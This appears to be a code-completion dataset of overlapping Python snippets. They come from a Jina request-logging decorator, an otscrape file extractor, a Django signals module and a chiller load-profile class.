"shows logs for `JINA_LOG_LEVEL` > info. You can set this as an env",
"docs[:1]: for field in non_empty_fields: if field not in doc.non_empty_fields: non_empty_fields.pop(field) return non_empty_fields",
">>> from jina import Executor, requests >>> my_logger = JinaLogger('MyExecLogger') >>> >>> class",
"\"\"\" def decorator(function): @functools.wraps(function) def wrapper(self, docs, parameters, **kwargs): verbose_level = os.environ.get('JINA_LOG_LEVEL', None)",
"before starting your `Jina` application. Example usages: >>> from jina import Executor, requests",
"**kwargs): verbose_level = os.environ.get('JINA_LOG_LEVEL', None) verbose_level = LogVerbosity.from_string(verbose_level) if verbose_level else None if",
"documents.') logger.debug(f'📕 Received parameters dictionary: {parameters}') if len(docs) > 0: non_empty_fields = _get_non_empty_fields_doc_array(docs)",
"parameters, **kwargs) logger.debug(f'📄 Received request containing {len(docs)} documents.') logger.debug(f'📕 Received parameters dictionary: {parameters}')",
"return non_empty_fields def add_request_logger(logger): \"\"\" Add logging functionality to a request function. Only"
] |
[
"self.target x = page[target] assert isinstance(x, (LineObject,)) return x.content class FileName(Extractor): def __init__(self,",
"assert isinstance(x, (LineObject,)) return x.content class FileName(Extractor): def __init__(self, target=None, *, project=True, replace_error=None,",
"isinstance(x, (LineObject,)) return x.content class FileName(Extractor): def __init__(self, target=None, *, project=True, replace_error=None, **kwargs):",
"import Extractor from otscrape.core.loader.file import LineObject class FileContent(Extractor): def __init__(self, target=None, *, project=True,",
"cache): target = self.target x = page[target] assert isinstance(x, (LineObject,)) return x.content class",
"= kwargs def extract(self, page, cache): target = self.target x = page[target] assert",
"x = page[target] assert isinstance(x, (LineObject,)) return x.content class FileName(Extractor): def __init__(self, target=None,",
"x.content class FileName(Extractor): def __init__(self, target=None, *, project=True, replace_error=None, **kwargs): super().__init__(target=target, project=project, replace_error=replace_error)",
"def __init__(self, target=None, *, project=True, replace_error=None, **kwargs): super().__init__(target=target, project=project, replace_error=replace_error) self.kwargs = kwargs",
"otscrape.core.base.extractor import Extractor from otscrape.core.loader.file import LineObject class FileContent(Extractor): def __init__(self, target=None, *,",
"replace_error=replace_error) self.kwargs = kwargs def extract(self, page, cache): target = self.target x =",
"def extract(self, page, cache): target = self.target x = page[target] assert isinstance(x, (LineObject,))",
"target=None, *, project=True, replace_error=None, **kwargs): super().__init__(target=target, project=project, replace_error=replace_error) self.kwargs = kwargs def extract(self,",
"kwargs def extract(self, page, cache): target = self.target x = page[target] assert isinstance(x,",
"target = self.target x = page[target] assert isinstance(x, (LineObject,)) return x.content class FileName(Extractor):",
"page, cache): target = self.target x = page[target] assert isinstance(x, (LineObject,)) return x.filename",
"replace_error=None, **kwargs): super().__init__(target=target, project=project, replace_error=replace_error) self.kwargs = kwargs def extract(self, page, cache): target",
"*, project=True, replace_error=None, **kwargs): super().__init__(target=target, project=project, replace_error=replace_error) self.kwargs = kwargs def extract(self, page,",
"Extractor from otscrape.core.loader.file import LineObject class FileContent(Extractor): def __init__(self, target=None, *, project=True, replace_error=None,",
"otscrape.core.loader.file import LineObject class FileContent(Extractor): def __init__(self, target=None, *, project=True, replace_error=None, **kwargs): super().__init__(target=target,",
"<gh_stars>0 from otscrape.core.base.extractor import Extractor from otscrape.core.loader.file import LineObject class FileContent(Extractor): def __init__(self,",
"project=project, replace_error=replace_error) self.kwargs = kwargs def extract(self, page, cache): target = self.target x",
"page, cache): target = self.target x = page[target] assert isinstance(x, (LineObject,)) return x.content",
"super().__init__(target=target, project=project, replace_error=replace_error) self.kwargs = kwargs def extract(self, page, cache): target = self.target",
"from otscrape.core.base.extractor import Extractor from otscrape.core.loader.file import LineObject class FileContent(Extractor): def __init__(self, target=None,",
"self.kwargs = kwargs def extract(self, page, cache): target = self.target x = page[target]",
"FileName(Extractor): def __init__(self, target=None, *, project=True, replace_error=None, **kwargs): super().__init__(target=target, project=project, replace_error=replace_error) self.kwargs =",
"import LineObject class FileContent(Extractor): def __init__(self, target=None, *, project=True, replace_error=None, **kwargs): super().__init__(target=target, project=project,",
"LineObject class FileContent(Extractor): def __init__(self, target=None, *, project=True, replace_error=None, **kwargs): super().__init__(target=target, project=project, replace_error=replace_error)",
"FileContent(Extractor): def __init__(self, target=None, *, project=True, replace_error=None, **kwargs): super().__init__(target=target, project=project, replace_error=replace_error) self.kwargs =",
"project=True, replace_error=None, **kwargs): super().__init__(target=target, project=project, replace_error=replace_error) self.kwargs = kwargs def extract(self, page, cache):",
"= self.target x = page[target] assert isinstance(x, (LineObject,)) return x.content class FileName(Extractor): def",
"class FileContent(Extractor): def __init__(self, target=None, *, project=True, replace_error=None, **kwargs): super().__init__(target=target, project=project, replace_error=replace_error) self.kwargs",
"page[target] assert isinstance(x, (LineObject,)) return x.content class FileName(Extractor): def __init__(self, target=None, *, project=True,",
"**kwargs): super().__init__(target=target, project=project, replace_error=replace_error) self.kwargs = kwargs def extract(self, page, cache): target =",
"= page[target] assert isinstance(x, (LineObject,)) return x.content class FileName(Extractor): def __init__(self, target=None, *,",
"from otscrape.core.loader.file import LineObject class FileContent(Extractor): def __init__(self, target=None, *, project=True, replace_error=None, **kwargs):",
"return x.content class FileName(Extractor): def __init__(self, target=None, *, project=True, replace_error=None, **kwargs): super().__init__(target=target, project=project,",
"class FileName(Extractor): def __init__(self, target=None, *, project=True, replace_error=None, **kwargs): super().__init__(target=target, project=project, replace_error=replace_error) self.kwargs",
"(LineObject,)) return x.content class FileName(Extractor): def __init__(self, target=None, *, project=True, replace_error=None, **kwargs): super().__init__(target=target,",
"__init__(self, target=None, *, project=True, replace_error=None, **kwargs): super().__init__(target=target, project=project, replace_error=replace_error) self.kwargs = kwargs def",
"extract(self, page, cache): target = self.target x = page[target] assert isinstance(x, (LineObject,)) return"
] |
[
"kungfucms # TIME : 2020/6/9 12:54 # AUTHOR : <NAME> # EMAIL :",
"13811754531 # https://github.com/youngershen from django.core.signals import request_started, \\ request_finished from django.dispatch import Signal,",
"TIME : 2020/6/9 12:54 # AUTHOR : <NAME> # EMAIL : <EMAIL> #",
"before_sign_in = Signal(providing_args=[\"toppings\", \"size\"]) after_sign_in = Signal(providing_args=[\"toppings\", \"size\"]) sign_in_post_permission = Signal(providing_args=[\"toppings\", \"size\"]) @receiver(request_started)",
"PROJECT : kungfucms # TIME : 2020/6/9 12:54 # AUTHOR : <NAME> #",
"# WECHAT : 13811754531 # https://github.com/youngershen from django.core.signals import request_started, \\ request_finished from",
"= Signal(providing_args=[\"toppings\", \"size\"]) sign_in_post_permission = Signal(providing_args=[\"toppings\", \"size\"]) @receiver(request_started) def before_request(sender, **kwargs): pass @receiver(request_finished)",
"request_finished from django.dispatch import Signal, receiver before_sign_in = Signal(providing_args=[\"toppings\", \"size\"]) after_sign_in = Signal(providing_args=[\"toppings\",",
"PHONE : 13811754531 # WECHAT : 13811754531 # https://github.com/youngershen from django.core.signals import request_started,",
"# TIME : 2020/6/9 12:54 # AUTHOR : <NAME> # EMAIL : <EMAIL>",
"12:54 # AUTHOR : <NAME> # EMAIL : <EMAIL> # PHONE : 13811754531",
"\"size\"]) sign_in_post_permission = Signal(providing_args=[\"toppings\", \"size\"]) @receiver(request_started) def before_request(sender, **kwargs): pass @receiver(request_finished) def after_request(sender,",
"request_started, \\ request_finished from django.dispatch import Signal, receiver before_sign_in = Signal(providing_args=[\"toppings\", \"size\"]) after_sign_in",
": 2020/6/9 12:54 # AUTHOR : <NAME> # EMAIL : <EMAIL> # PHONE",
"from django.dispatch import Signal, receiver before_sign_in = Signal(providing_args=[\"toppings\", \"size\"]) after_sign_in = Signal(providing_args=[\"toppings\", \"size\"])",
"django.core.signals import request_started, \\ request_finished from django.dispatch import Signal, receiver before_sign_in = Signal(providing_args=[\"toppings\",",
"import request_started, \\ request_finished from django.dispatch import Signal, receiver before_sign_in = Signal(providing_args=[\"toppings\", \"size\"])",
"# EMAIL : <EMAIL> # PHONE : 13811754531 # WECHAT : 13811754531 #",
": 13811754531 # https://github.com/youngershen from django.core.signals import request_started, \\ request_finished from django.dispatch import",
"= Signal(providing_args=[\"toppings\", \"size\"]) @receiver(request_started) def before_request(sender, **kwargs): pass @receiver(request_finished) def after_request(sender, **kwargs): pass",
"AUTHOR : <NAME> # EMAIL : <EMAIL> # PHONE : 13811754531 # WECHAT",
"<NAME> # EMAIL : <EMAIL> # PHONE : 13811754531 # WECHAT : 13811754531",
"13811754531 # WECHAT : 13811754531 # https://github.com/youngershen from django.core.signals import request_started, \\ request_finished",
"Signal, receiver before_sign_in = Signal(providing_args=[\"toppings\", \"size\"]) after_sign_in = Signal(providing_args=[\"toppings\", \"size\"]) sign_in_post_permission = Signal(providing_args=[\"toppings\",",
"import Signal, receiver before_sign_in = Signal(providing_args=[\"toppings\", \"size\"]) after_sign_in = Signal(providing_args=[\"toppings\", \"size\"]) sign_in_post_permission =",
"Signal(providing_args=[\"toppings\", \"size\"]) after_sign_in = Signal(providing_args=[\"toppings\", \"size\"]) sign_in_post_permission = Signal(providing_args=[\"toppings\", \"size\"]) @receiver(request_started) def before_request(sender,",
"# https://github.com/youngershen from django.core.signals import request_started, \\ request_finished from django.dispatch import Signal, receiver",
"\\ request_finished from django.dispatch import Signal, receiver before_sign_in = Signal(providing_args=[\"toppings\", \"size\"]) after_sign_in =",
"= Signal(providing_args=[\"toppings\", \"size\"]) after_sign_in = Signal(providing_args=[\"toppings\", \"size\"]) sign_in_post_permission = Signal(providing_args=[\"toppings\", \"size\"]) @receiver(request_started) def",
"# AUTHOR : <NAME> # EMAIL : <EMAIL> # PHONE : 13811754531 #",
": <EMAIL> # PHONE : 13811754531 # WECHAT : 13811754531 # https://github.com/youngershen from",
": 13811754531 # WECHAT : 13811754531 # https://github.com/youngershen from django.core.signals import request_started, \\",
": kungfucms # TIME : 2020/6/9 12:54 # AUTHOR : <NAME> # EMAIL",
"2020/6/9 12:54 # AUTHOR : <NAME> # EMAIL : <EMAIL> # PHONE :",
": <NAME> # EMAIL : <EMAIL> # PHONE : 13811754531 # WECHAT :",
"# PROJECT : kungfucms # TIME : 2020/6/9 12:54 # AUTHOR : <NAME>",
"sign_in_post_permission = Signal(providing_args=[\"toppings\", \"size\"]) @receiver(request_started) def before_request(sender, **kwargs): pass @receiver(request_finished) def after_request(sender, **kwargs):",
"Signal(providing_args=[\"toppings\", \"size\"]) sign_in_post_permission = Signal(providing_args=[\"toppings\", \"size\"]) @receiver(request_started) def before_request(sender, **kwargs): pass @receiver(request_finished) def",
"EMAIL : <EMAIL> # PHONE : 13811754531 # WECHAT : 13811754531 # https://github.com/youngershen",
"receiver before_sign_in = Signal(providing_args=[\"toppings\", \"size\"]) after_sign_in = Signal(providing_args=[\"toppings\", \"size\"]) sign_in_post_permission = Signal(providing_args=[\"toppings\", \"size\"])",
"after_sign_in = Signal(providing_args=[\"toppings\", \"size\"]) sign_in_post_permission = Signal(providing_args=[\"toppings\", \"size\"]) @receiver(request_started) def before_request(sender, **kwargs): pass",
"# PHONE : 13811754531 # WECHAT : 13811754531 # https://github.com/youngershen from django.core.signals import",
"WECHAT : 13811754531 # https://github.com/youngershen from django.core.signals import request_started, \\ request_finished from django.dispatch",
"from django.core.signals import request_started, \\ request_finished from django.dispatch import Signal, receiver before_sign_in =",
"\"size\"]) after_sign_in = Signal(providing_args=[\"toppings\", \"size\"]) sign_in_post_permission = Signal(providing_args=[\"toppings\", \"size\"]) @receiver(request_started) def before_request(sender, **kwargs):",
"django.dispatch import Signal, receiver before_sign_in = Signal(providing_args=[\"toppings\", \"size\"]) after_sign_in = Signal(providing_args=[\"toppings\", \"size\"]) sign_in_post_permission",
"https://github.com/youngershen from django.core.signals import request_started, \\ request_finished from django.dispatch import Signal, receiver before_sign_in",
"<EMAIL> # PHONE : 13811754531 # WECHAT : 13811754531 # https://github.com/youngershen from django.core.signals"
] |
[
"for i in range(len(numbers)): if numbers[i] >= numbers[index]: index = i return index",
"algorithm here index = 0 for i in range(len(numbers)): if numbers[i] >= numbers[index]:",
"= 0 for i in range(len(numbers)): if numbers[i] >= numbers[index]: index = i",
"# write the modified algorithm here index = 0 for i in range(len(numbers)):",
"0 for i in range(len(numbers)): if numbers[i] >= numbers[index]: index = i return",
"write the modified algorithm here index = 0 for i in range(len(numbers)): if",
"def last_indexof_max(numbers): # write the modified algorithm here index = 0 for i",
"modified algorithm here index = 0 for i in range(len(numbers)): if numbers[i] >=",
"index = 0 for i in range(len(numbers)): if numbers[i] >= numbers[index]: index =",
"the modified algorithm here index = 0 for i in range(len(numbers)): if numbers[i]",
"here index = 0 for i in range(len(numbers)): if numbers[i] >= numbers[index]: index",
"last_indexof_max(numbers): # write the modified algorithm here index = 0 for i in"
] |
[
"\"\"\" 02 - Qual o valor do troco? Defina uma variável para o",
"uma variável para o valor de uma compra que custou R$100,98; Defina uma",
"o valor do troco? Defina uma variável para o valor de uma compra",
"valor do troco? Defina uma variável para o valor de uma compra que",
"R$100,98; Defina uma variável para o valor que o cliente pagou R$150,00; Defina",
"o valor que o cliente pagou R$150,00; Defina uma variável que calcula o",
"custou R$100,98; Defina uma variável para o valor que o cliente pagou R$150,00;",
"uma variável para o valor que o cliente pagou R$150,00; Defina uma variável",
"cliente pagou R$150,00; Defina uma variável que calcula o valor do troco e",
"uma compra que custou R$100,98; Defina uma variável para o valor que o",
"uma variável que calcula o valor do troco e exiba-o no console com",
"valor que o cliente pagou R$150,00; Defina uma variável que calcula o valor",
"no console com o valor final arredondado. \"\"\" valor_compra = 100.98 valor_pago =",
"final arredondado. \"\"\" valor_compra = 100.98 valor_pago = 150.00 troco = valor_pago -",
"para o valor que o cliente pagou R$150,00; Defina uma variável que calcula",
"\"\"\" valor_compra = 100.98 valor_pago = 150.00 troco = valor_pago - valor_compra print(f'O",
"que custou R$100,98; Defina uma variável para o valor que o cliente pagou",
"do troco e exiba-o no console com o valor final arredondado. \"\"\" valor_compra",
"100.98 valor_pago = 150.00 troco = valor_pago - valor_compra print(f'O seu troco é:",
"exiba-o no console com o valor final arredondado. \"\"\" valor_compra = 100.98 valor_pago",
"variável que calcula o valor do troco e exiba-o no console com o",
"o valor final arredondado. \"\"\" valor_compra = 100.98 valor_pago = 150.00 troco =",
"troco? Defina uma variável para o valor de uma compra que custou R$100,98;",
"que o cliente pagou R$150,00; Defina uma variável que calcula o valor do",
"variável para o valor que o cliente pagou R$150,00; Defina uma variável que",
"que calcula o valor do troco e exiba-o no console com o valor",
"console com o valor final arredondado. \"\"\" valor_compra = 100.98 valor_pago = 150.00",
"o valor do troco e exiba-o no console com o valor final arredondado.",
"Defina uma variável que calcula o valor do troco e exiba-o no console",
"02 - Qual o valor do troco? Defina uma variável para o valor",
"o cliente pagou R$150,00; Defina uma variável que calcula o valor do troco",
"pagou R$150,00; Defina uma variável que calcula o valor do troco e exiba-o",
"com o valor final arredondado. \"\"\" valor_compra = 100.98 valor_pago = 150.00 troco",
"variável para o valor de uma compra que custou R$100,98; Defina uma variável",
"compra que custou R$100,98; Defina uma variável para o valor que o cliente",
"e exiba-o no console com o valor final arredondado. \"\"\" valor_compra = 100.98",
"arredondado. \"\"\" valor_compra = 100.98 valor_pago = 150.00 troco = valor_pago - valor_compra",
"valor final arredondado. \"\"\" valor_compra = 100.98 valor_pago = 150.00 troco = valor_pago",
"para o valor de uma compra que custou R$100,98; Defina uma variável para",
"= 100.98 valor_pago = 150.00 troco = valor_pago - valor_compra print(f'O seu troco",
"Qual o valor do troco? Defina uma variável para o valor de uma",
"R$150,00; Defina uma variável que calcula o valor do troco e exiba-o no",
"- Qual o valor do troco? Defina uma variável para o valor de",
"o valor de uma compra que custou R$100,98; Defina uma variável para o",
"<filename>aula2/exercicio2.py \"\"\" 02 - Qual o valor do troco? Defina uma variável para",
"do troco? Defina uma variável para o valor de uma compra que custou",
"= 150.00 troco = valor_pago - valor_compra print(f'O seu troco é: R$ {troco:.2f}')",
"valor do troco e exiba-o no console com o valor final arredondado. \"\"\"",
"calcula o valor do troco e exiba-o no console com o valor final",
"de uma compra que custou R$100,98; Defina uma variável para o valor que",
"Defina uma variável para o valor que o cliente pagou R$150,00; Defina uma",
"Defina uma variável para o valor de uma compra que custou R$100,98; Defina",
"valor_pago = 150.00 troco = valor_pago - valor_compra print(f'O seu troco é: R$",
"troco e exiba-o no console com o valor final arredondado. \"\"\" valor_compra =",
"valor de uma compra que custou R$100,98; Defina uma variável para o valor",
"valor_compra = 100.98 valor_pago = 150.00 troco = valor_pago - valor_compra print(f'O seu"
] |
[
"sys import maxsize class Contact: def __init__(self, firstname=None, middlename=None, lastname=None, id=None, nickname=None, title=None,",
"self.email_2 = email_2 self.email_3 = email_3 self.homepage = homepage self.address_2 = address_2 self.homephone2",
"= workphone self.fax = fax self.email_1 = email_1 self.email_2 = email_2 self.email_3 =",
"self.homephone2 = homephone2 self.notes = notes self.all_emails_from_homepage = all_emails_from_homepage self.all_phones_from_homepage = all_phones_from_homepage self.id",
"all_phones_from_homepage=None): self.firstname = firstname self.middlename = middlename self.lastname = lastname self.nickname = nickname",
"None or self.id == other.id) and self.lastname == other.lastname and self.firstname == other.firstname",
"= firstname self.middlename = middlename self.lastname = lastname self.nickname = nickname self.title =",
"\"%s:%s:%s\" % (self.id, self.firstname, self.lastname) def __eq__(self, other): return (self.id is None or",
"= address_2 self.homephone2 = homephone2 self.notes = notes self.all_emails_from_homepage = all_emails_from_homepage self.all_phones_from_homepage =",
"self.id == other.id) and self.lastname == other.lastname and self.firstname == other.firstname def id_or_max(self):",
"(self.id, self.firstname, self.lastname) def __eq__(self, other): return (self.id is None or other.id is",
"__repr__(self): return \"%s:%s:%s\" % (self.id, self.firstname, self.lastname) def __eq__(self, other): return (self.id is",
"def __init__(self, firstname=None, middlename=None, lastname=None, id=None, nickname=None, title=None, company=None, address=None, homephone=None, mobilephone=None, workphone=None,",
"= lastname self.nickname = nickname self.title = title self.company = company self.address =",
"homephone self.mobilephone = mobilephone self.workphone = workphone self.fax = fax self.email_1 = email_1",
"id=None, nickname=None, title=None, company=None, address=None, homephone=None, mobilephone=None, workphone=None, fax=None, email_1=None, email_2=None, email_3=None, homepage=None,",
"import maxsize class Contact: def __init__(self, firstname=None, middlename=None, lastname=None, id=None, nickname=None, title=None, company=None,",
"homepage self.address_2 = address_2 self.homephone2 = homephone2 self.notes = notes self.all_emails_from_homepage = all_emails_from_homepage",
"address self.homephone = homephone self.mobilephone = mobilephone self.workphone = workphone self.fax = fax",
"self.firstname, self.lastname) def __eq__(self, other): return (self.id is None or other.id is None",
"or self.id == other.id) and self.lastname == other.lastname and self.firstname == other.firstname def",
"title self.company = company self.address = address self.homephone = homephone self.mobilephone = mobilephone",
"None or other.id is None or self.id == other.id) and self.lastname == other.lastname",
"email_2=None, email_3=None, homepage=None, address_2=None, homephone2=None, notes=None, all_emails_from_homepage=None, all_phones_from_homepage=None): self.firstname = firstname self.middlename =",
"self.title = title self.company = company self.address = address self.homephone = homephone self.mobilephone",
"self.address = address self.homephone = homephone self.mobilephone = mobilephone self.workphone = workphone self.fax",
"__init__(self, firstname=None, middlename=None, lastname=None, id=None, nickname=None, title=None, company=None, address=None, homephone=None, mobilephone=None, workphone=None, fax=None,",
"= company self.address = address self.homephone = homephone self.mobilephone = mobilephone self.workphone =",
"= title self.company = company self.address = address self.homephone = homephone self.mobilephone =",
"self.all_phones_from_homepage = all_phones_from_homepage self.id = id def __repr__(self): return \"%s:%s:%s\" % (self.id, self.firstname,",
"workphone=None, fax=None, email_1=None, email_2=None, email_3=None, homepage=None, address_2=None, homephone2=None, notes=None, all_emails_from_homepage=None, all_phones_from_homepage=None): self.firstname =",
"self.workphone = workphone self.fax = fax self.email_1 = email_1 self.email_2 = email_2 self.email_3",
"= notes self.all_emails_from_homepage = all_emails_from_homepage self.all_phones_from_homepage = all_phones_from_homepage self.id = id def __repr__(self):",
"all_emails_from_homepage self.all_phones_from_homepage = all_phones_from_homepage self.id = id def __repr__(self): return \"%s:%s:%s\" % (self.id,",
"title=None, company=None, address=None, homephone=None, mobilephone=None, workphone=None, fax=None, email_1=None, email_2=None, email_3=None, homepage=None, address_2=None, homephone2=None,",
"homephone2 self.notes = notes self.all_emails_from_homepage = all_emails_from_homepage self.all_phones_from_homepage = all_phones_from_homepage self.id = id",
"= nickname self.title = title self.company = company self.address = address self.homephone =",
"self.lastname) def __eq__(self, other): return (self.id is None or other.id is None or",
"self.homepage = homepage self.address_2 = address_2 self.homephone2 = homephone2 self.notes = notes self.all_emails_from_homepage",
"self.address_2 = address_2 self.homephone2 = homephone2 self.notes = notes self.all_emails_from_homepage = all_emails_from_homepage self.all_phones_from_homepage",
"self.homephone = homephone self.mobilephone = mobilephone self.workphone = workphone self.fax = fax self.email_1",
"firstname self.middlename = middlename self.lastname = lastname self.nickname = nickname self.title = title",
"notes=None, all_emails_from_homepage=None, all_phones_from_homepage=None): self.firstname = firstname self.middlename = middlename self.lastname = lastname self.nickname",
"email_1=None, email_2=None, email_3=None, homepage=None, address_2=None, homephone2=None, notes=None, all_emails_from_homepage=None, all_phones_from_homepage=None): self.firstname = firstname self.middlename",
"class Contact: def __init__(self, firstname=None, middlename=None, lastname=None, id=None, nickname=None, title=None, company=None, address=None, homephone=None,",
"self.middlename = middlename self.lastname = lastname self.nickname = nickname self.title = title self.company",
"= all_emails_from_homepage self.all_phones_from_homepage = all_phones_from_homepage self.id = id def __repr__(self): return \"%s:%s:%s\" %",
"workphone self.fax = fax self.email_1 = email_1 self.email_2 = email_2 self.email_3 = email_3",
"other.id is None or self.id == other.id) and self.lastname == other.lastname and self.firstname",
"(self.id is None or other.id is None or self.id == other.id) and self.lastname",
"def __eq__(self, other): return (self.id is None or other.id is None or self.id",
"maxsize class Contact: def __init__(self, firstname=None, middlename=None, lastname=None, id=None, nickname=None, title=None, company=None, address=None,",
"email_3 self.homepage = homepage self.address_2 = address_2 self.homephone2 = homephone2 self.notes = notes",
"self.email_3 = email_3 self.homepage = homepage self.address_2 = address_2 self.homephone2 = homephone2 self.notes",
"or other.id is None or self.id == other.id) and self.lastname == other.lastname and",
"<reponame>dmi-vor/python_training<gh_stars>0 from sys import maxsize class Contact: def __init__(self, firstname=None, middlename=None, lastname=None, id=None,",
"address=None, homephone=None, mobilephone=None, workphone=None, fax=None, email_1=None, email_2=None, email_3=None, homepage=None, address_2=None, homephone2=None, notes=None, all_emails_from_homepage=None,",
"= id def __repr__(self): return \"%s:%s:%s\" % (self.id, self.firstname, self.lastname) def __eq__(self, other):",
"self.firstname = firstname self.middlename = middlename self.lastname = lastname self.nickname = nickname self.title",
"Contact: def __init__(self, firstname=None, middlename=None, lastname=None, id=None, nickname=None, title=None, company=None, address=None, homephone=None, mobilephone=None,",
"all_emails_from_homepage=None, all_phones_from_homepage=None): self.firstname = firstname self.middlename = middlename self.lastname = lastname self.nickname =",
"is None or other.id is None or self.id == other.id) and self.lastname ==",
"self.all_emails_from_homepage = all_emails_from_homepage self.all_phones_from_homepage = all_phones_from_homepage self.id = id def __repr__(self): return \"%s:%s:%s\"",
"email_2 self.email_3 = email_3 self.homepage = homepage self.address_2 = address_2 self.homephone2 = homephone2",
"id def __repr__(self): return \"%s:%s:%s\" % (self.id, self.firstname, self.lastname) def __eq__(self, other): return",
"firstname=None, middlename=None, lastname=None, id=None, nickname=None, title=None, company=None, address=None, homephone=None, mobilephone=None, workphone=None, fax=None, email_1=None,",
"self.company = company self.address = address self.homephone = homephone self.mobilephone = mobilephone self.workphone",
"lastname self.nickname = nickname self.title = title self.company = company self.address = address",
"homephone=None, mobilephone=None, workphone=None, fax=None, email_1=None, email_2=None, email_3=None, homepage=None, address_2=None, homephone2=None, notes=None, all_emails_from_homepage=None, all_phones_from_homepage=None):",
"= email_2 self.email_3 = email_3 self.homepage = homepage self.address_2 = address_2 self.homephone2 =",
"= email_3 self.homepage = homepage self.address_2 = address_2 self.homephone2 = homephone2 self.notes =",
"other.lastname and self.firstname == other.firstname def id_or_max(self): if self.id: return int(self.id) else: return",
"self.lastname == other.lastname and self.firstname == other.firstname def id_or_max(self): if self.id: return int(self.id)",
"company=None, address=None, homephone=None, mobilephone=None, workphone=None, fax=None, email_1=None, email_2=None, email_3=None, homepage=None, address_2=None, homephone2=None, notes=None,",
"= homepage self.address_2 = address_2 self.homephone2 = homephone2 self.notes = notes self.all_emails_from_homepage =",
"from sys import maxsize class Contact: def __init__(self, firstname=None, middlename=None, lastname=None, id=None, nickname=None,",
"middlename=None, lastname=None, id=None, nickname=None, title=None, company=None, address=None, homephone=None, mobilephone=None, workphone=None, fax=None, email_1=None, email_2=None,",
"nickname self.title = title self.company = company self.address = address self.homephone = homephone",
"= middlename self.lastname = lastname self.nickname = nickname self.title = title self.company =",
"mobilephone self.workphone = workphone self.fax = fax self.email_1 = email_1 self.email_2 = email_2",
"self.nickname = nickname self.title = title self.company = company self.address = address self.homephone",
"and self.lastname == other.lastname and self.firstname == other.firstname def id_or_max(self): if self.id: return",
"return \"%s:%s:%s\" % (self.id, self.firstname, self.lastname) def __eq__(self, other): return (self.id is None",
"self.email_1 = email_1 self.email_2 = email_2 self.email_3 = email_3 self.homepage = homepage self.address_2",
"self.lastname = lastname self.nickname = nickname self.title = title self.company = company self.address",
"other): return (self.id is None or other.id is None or self.id == other.id)",
"= homephone self.mobilephone = mobilephone self.workphone = workphone self.fax = fax self.email_1 =",
"lastname=None, id=None, nickname=None, title=None, company=None, address=None, homephone=None, mobilephone=None, workphone=None, fax=None, email_1=None, email_2=None, email_3=None,",
"homepage=None, address_2=None, homephone2=None, notes=None, all_emails_from_homepage=None, all_phones_from_homepage=None): self.firstname = firstname self.middlename = middlename self.lastname",
"self.notes = notes self.all_emails_from_homepage = all_emails_from_homepage self.all_phones_from_homepage = all_phones_from_homepage self.id = id def",
"== other.lastname and self.firstname == other.firstname def id_or_max(self): if self.id: return int(self.id) else:",
"def __repr__(self): return \"%s:%s:%s\" % (self.id, self.firstname, self.lastname) def __eq__(self, other): return (self.id",
"= mobilephone self.workphone = workphone self.fax = fax self.email_1 = email_1 self.email_2 =",
"= all_phones_from_homepage self.id = id def __repr__(self): return \"%s:%s:%s\" % (self.id, self.firstname, self.lastname)",
"self.id = id def __repr__(self): return \"%s:%s:%s\" % (self.id, self.firstname, self.lastname) def __eq__(self,",
"company self.address = address self.homephone = homephone self.mobilephone = mobilephone self.workphone = workphone",
"fax self.email_1 = email_1 self.email_2 = email_2 self.email_3 = email_3 self.homepage = homepage",
"return (self.id is None or other.id is None or self.id == other.id) and",
"== other.id) and self.lastname == other.lastname and self.firstname == other.firstname def id_or_max(self): if",
"is None or self.id == other.id) and self.lastname == other.lastname and self.firstname ==",
"self.mobilephone = mobilephone self.workphone = workphone self.fax = fax self.email_1 = email_1 self.email_2",
"= email_1 self.email_2 = email_2 self.email_3 = email_3 self.homepage = homepage self.address_2 =",
"notes self.all_emails_from_homepage = all_emails_from_homepage self.all_phones_from_homepage = all_phones_from_homepage self.id = id def __repr__(self): return",
"other.id) and self.lastname == other.lastname and self.firstname == other.firstname def id_or_max(self): if self.id:",
"address_2=None, homephone2=None, notes=None, all_emails_from_homepage=None, all_phones_from_homepage=None): self.firstname = firstname self.middlename = middlename self.lastname =",
"fax=None, email_1=None, email_2=None, email_3=None, homepage=None, address_2=None, homephone2=None, notes=None, all_emails_from_homepage=None, all_phones_from_homepage=None): self.firstname = firstname",
"all_phones_from_homepage self.id = id def __repr__(self): return \"%s:%s:%s\" % (self.id, self.firstname, self.lastname) def",
"% (self.id, self.firstname, self.lastname) def __eq__(self, other): return (self.id is None or other.id",
"email_3=None, homepage=None, address_2=None, homephone2=None, notes=None, all_emails_from_homepage=None, all_phones_from_homepage=None): self.firstname = firstname self.middlename = middlename",
"homephone2=None, notes=None, all_emails_from_homepage=None, all_phones_from_homepage=None): self.firstname = firstname self.middlename = middlename self.lastname = lastname",
"middlename self.lastname = lastname self.nickname = nickname self.title = title self.company = company",
"email_1 self.email_2 = email_2 self.email_3 = email_3 self.homepage = homepage self.address_2 = address_2",
"= fax self.email_1 = email_1 self.email_2 = email_2 self.email_3 = email_3 self.homepage =",
"address_2 self.homephone2 = homephone2 self.notes = notes self.all_emails_from_homepage = all_emails_from_homepage self.all_phones_from_homepage = all_phones_from_homepage",
"self.fax = fax self.email_1 = email_1 self.email_2 = email_2 self.email_3 = email_3 self.homepage",
"nickname=None, title=None, company=None, address=None, homephone=None, mobilephone=None, workphone=None, fax=None, email_1=None, email_2=None, email_3=None, homepage=None, address_2=None,",
"and self.firstname == other.firstname def id_or_max(self): if self.id: return int(self.id) else: return maxsize",
"= address self.homephone = homephone self.mobilephone = mobilephone self.workphone = workphone self.fax =",
"__eq__(self, other): return (self.id is None or other.id is None or self.id ==",
"= homephone2 self.notes = notes self.all_emails_from_homepage = all_emails_from_homepage self.all_phones_from_homepage = all_phones_from_homepage self.id =",
"mobilephone=None, workphone=None, fax=None, email_1=None, email_2=None, email_3=None, homepage=None, address_2=None, homephone2=None, notes=None, all_emails_from_homepage=None, all_phones_from_homepage=None): self.firstname"
] |
[
"(float) site latitude :param longitude: (float) site longitude :param nearest_city: (str) site nearest_city",
"kwargs: (dict) Chiller specific inputs as defined in reo/nested_inputs \"\"\" self.nearest_city = nearest_city",
"kWth if electric_load_list is not None: self.load_list = [i*self.chiller_cop for i in electric_load_list]",
"time_steps_per_hour > 1: partial_load_list = np.concatenate([[x] * time_steps_per_hour \\ for x in self.built_in_profile])",
"else: electric_load_list = hybrid_loadlist # If no doe_reference_name or loads_ton provided, scale by",
"later to see if we need to covert kWh to kWht electric_load_list =",
"is not None: self.load_list = [i*self.chiller_cop for i in electric_load_list] self.annual_kwht = int(round(sum(self.load_list),0))",
"Chiller Load Profiles based on CRB defined load shapes or user-defined input \"\"\"",
"scalar) #Apply the percent share of annual load to each partial load if",
